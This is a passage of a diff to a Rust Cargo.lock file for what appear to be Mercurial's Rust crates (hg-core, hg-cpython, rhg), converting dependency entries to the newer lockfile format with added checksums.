(registry+https://github.com/rust-lang/crates.io-index)", - "num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "num-integer", + "num-traits", + "time", + "winapi", ] [[package]] name = "clap" version = "2.33.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", - "vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "atty", + "bitflags", + "strsim", + "textwrap", + "unicode-width", + "vec_map", ] [[package]] name = "const_fn" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" [[package]] name = "cpython" version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "num-traits", + "python27-sys", + "python3-sys", ] [[package]] name = "crc32fast" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", ] [[package]] name = "crossbeam-channel" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" dependencies = [ - "crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)", - "maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-utils 0.7.2", + "maybe-uninit", ] [[package]] name = "crossbeam-channel" version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-deque" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-epoch", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-epoch" version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "const_fn", + "crossbeam-utils 0.8.1", + "lazy_static", + "memoffset", + "scopeguard", ] [[package]] name = "crossbeam-utils" version = "0.7.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 0.1.10", + "lazy_static", ] [[package]] name = "crossbeam-utils" version = "0.8.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 1.0.0", + "lazy_static", ] [[package]] name = "ctor" version = "0.1.16" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" dependencies = [ - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "quote", + "syn", ] [[package]] name = "derive_more" version = "0.99.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "difference" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" [[package]] name = "either" version = "1.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" [[package]] name = "env_logger" version = "0.7.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" dependencies = [ - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "atty", + "humantime", + "log", + "regex", + "termcolor", ] [[package]] name = "flate2" version = "1.0.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", - "miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crc32fast", + "libc", + "libz-sys", + "miniz_oxide", ] [[package]] name = "format-bytes" version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" dependencies = [ - "format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes-macros", + "proc-macro-hack", ] [[package]] name = "format-bytes-macros" version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" dependencies = [ - "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro-hack", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "fuchsia-cprng" version = "0.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" [[package]] name = "gcc" version = "0.3.55" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" [[package]] name = "getrandom" version = "0.1.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "wasi 0.9.0+wasi-snapshot-preview1", ] [[package]] name = "glob" version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" [[package]] name = "hermit-abi" version = "0.1.17" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] name = "hg-core" version = "0.1.0" dependencies = [ - "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "bytes-cast 0.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)", - "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", - "home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)", - "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)", - "same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)", - "tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "byteorder", + "bytes-cast", + "clap", + "crossbeam-channel 0.4.4", + "derive_more", + "flate2", + "format-bytes", + "home", + "im-rc", + "lazy_static", + "log", + "memmap", + "micro-timer", + "pretty_assertions", + "rand 0.7.3", + "rand_distr", + "rand_pcg", + "rayon", + "regex", + "rust-crypto", + "same-file", + "tempfile", + "twox-hash", + "zstd", ] [[package]] name = "hg-cpython" version = "0.1.0" dependencies = [ - "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cpython", + "crossbeam-channel 0.4.4", + "env_logger", + "hg-core", + "libc", + "log", ] [[package]] name = "home" version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "humantime" version = "1.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" dependencies = [ - "quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)", + "quick-error", ] [[package]] name = "im-rc" version = "15.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", - "version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "rand_core 0.5.1", + "rand_xoshiro", + "sized-chunks", + "typenum", + "version_check", ] [[package]] name = "itertools" version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" dependencies = [ - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", + "either", ] [[package]] name = "jobserver" version = "0.1.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] name = "lazy_static" version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" [[package]] name = "libc" version = "0.2.81" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" [[package]] name = "libz-sys" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)", - "vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "pkg-config", + "vcpkg", ] [[package]] name = "log" version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", ] [[package]] name = "maybe-uninit" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" [[package]] name = "memchr" version = "2.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" [[package]] name = "memmap" version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "winapi", ] [[package]] name = "memoffset" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "micro-timer" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" dependencies = [ - "micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "micro-timer-macros", + "scopeguard", ] [[package]] name = "micro-timer-macros" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "scopeguard", + "syn", ] [[package]] name = "miniz_oxide" version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" dependencies = [ - "adler 0.2.3 (registry+https://github.com/rust-lang/crates.io-index)", - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "adler", + "autocfg", ] [[package]] name = "num-integer" version = "0.1.44" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "num-traits", ] [[package]] name = "num-traits" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "num_cpus" version = "1.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", ] [[package]] name = "output_vt100" version = "0.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "pkg-config" version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" [[package]] name = "ppv-lite86" version = "0.2.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" [[package]] name = "pretty_assertions" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" dependencies = [ - "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)", - "difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "ctor", + "difference", + "output_vt100", ] [[package]] name = "proc-macro-hack" version = "0.5.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" [[package]] name = "proc-macro2" version = "1.0.24" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" dependencies = [ - "unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", + "unicode-xid", ] [[package]] name = "python27-sys" version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "python3-sys" version = "0.4.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "regex", ] [[package]] name = "quick-error" version = "1.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" [[package]] name = "quote" version = "1.0.7" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", ] [[package]] name = "rand" version = "0.3.23" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "rand 0.4.6", ] [[package]] name = "rand" version = "0.4.6" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" dependencies = [ - "fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "fuchsia-cprng", + "libc", + "rand_core 0.3.1", + "rdrand", + "winapi", ] [[package]] name = "rand" version = "0.7.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", + "libc", + "rand_chacha", + "rand_core 0.5.1", + "rand_hc", ] [[package]] name = "rand_chacha" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" dependencies = [ - "ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "ppv-lite86", + "rand_core 0.5.1", ] [[package]] name = "rand_core" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" dependencies = [ - "rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.4.2", ] [[package]] name = "rand_core" version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" [[package]] name = "rand_core" version = "0.5.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" dependencies = [ - "getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)", + "getrandom", ] [[package]] name = "rand_distr" version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" dependencies = [ - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", + "rand 0.7.3", ] [[package]] name = "rand_hc" version = "0.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_pcg" version = "0.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rand_xoshiro" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" dependencies = [ - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.5.1", ] [[package]] name = "rayon" version = "1.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "crossbeam-deque", + "either", + "rayon-core", ] [[package]] name = "rayon-core" version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" dependencies = [ - "crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-channel 0.5.0", + "crossbeam-deque", + "crossbeam-utils 0.8.1", + "lazy_static", + "num_cpus", ] [[package]] name = "rdrand" version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" dependencies = [ - "rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", + "rand_core 0.3.1", ] [[package]] name = "redox_syscall" version = "0.1.57" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" [[package]] name = "regex" version = "1.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" dependencies = [ - "aho-corasick 0.7.15 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)", - "thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "aho-corasick", + "memchr", + "regex-syntax", + "thread_local", ] [[package]] name = "regex-syntax" version = "0.6.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" [[package]] name = "remove_dir_all" version = "0.5.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "rhg" version = "0.1.0" dependencies = [ - "chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)", - "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - 